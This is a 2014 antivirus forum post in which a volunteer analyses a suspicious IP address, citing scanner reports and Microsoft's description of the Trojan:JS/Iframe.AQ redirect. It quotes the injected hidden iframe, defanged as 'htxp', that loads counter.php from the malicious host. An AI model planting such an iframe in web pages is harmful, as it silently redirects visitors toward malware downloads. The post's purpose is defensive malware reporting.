Author Topic: Is this IP being blocked?  (Read 2033 times)

0 Members and 1 Guest are viewing this topic.

Offline polonus

  • Avast Überevangelist
  • Probably Bot
  • *****
  • Posts: 33925
  • malware fighter
Is this IP being blocked?
« on: January 16, 2014, 04:22:37 PM »
Re: http://www.scumware.org/report/59.125.136.182
See: http://app.webinspector.com/public/reports/show_website_details?site=http%3A%2F%2F59.125.136.182&type=iframes
and http://urlquery.net/report.php?id=8841410  & https://www.virustotal.com/nl/url/8c590a52c1a1b30b801aa60114f1c5d6af688e7bfa0305c177d2d2a72c95a8b8/analysis/
Iframe check: Suspicious

<iframe src="htxp://59.125.136.182/counter.php" style="visibility: hidden; position: absolute; left: 0px; top: 0px" widt

Injection check: Suspicious Text after HTML

<iframe src="htxp://59.125.136.182/counter.php" style="visibility: hidden; position: absolute; left: 0px; top: 0px" width="10" height="10"/>
See: http://jsunpack.jeek.org/?report=109428c2c4e87decbd3bf611b1b94fb55ef39640
external link to -yamnet/home/manager/html/counter.php See warnings: http://www.updc.com.tw/systemu/downloads.php?ServerFilename=20130515085933538.jpg&ServerFilename1=Files&ServerFilename2=product - mysql_fetch_array(): supplied argument is not a valid MySQL result resource in
Quote
Trojan:JS/Iframe.AQ is a malicious JavaScript file that is embedded, via an IFrame, into malicious or compromised webpages, usually via SQL injection or through Blackhat search engine optimization (SEO) poisoning. The purpose of the file is to redirect your browser to other sites that may download malware onto your computer.
info from MS Malware Protection Center

To avoid detection, the IFrame may be only one pixel in size.
See other detected live malware: http://support.clean-mx.de/clean-mx/viruses.php?inetnum=59.124.0.0%20-%2059.127.255.255&sort=first%20desc&response=alive
Detected by avast! -> https://www.virustotal.com/nl/file/88ac218d8038d7cc60ae78af4e6d1de04291b294f911cb26722ff94f897864fa/analysis/

pol
« Last Edit: January 16, 2014, 04:28:30 PM by polonus »
Cybersecurity is more of an attitude than anything else. Avast Evangelists.

Use NoScript, a limited user account and a virtual machine and be safe(r)!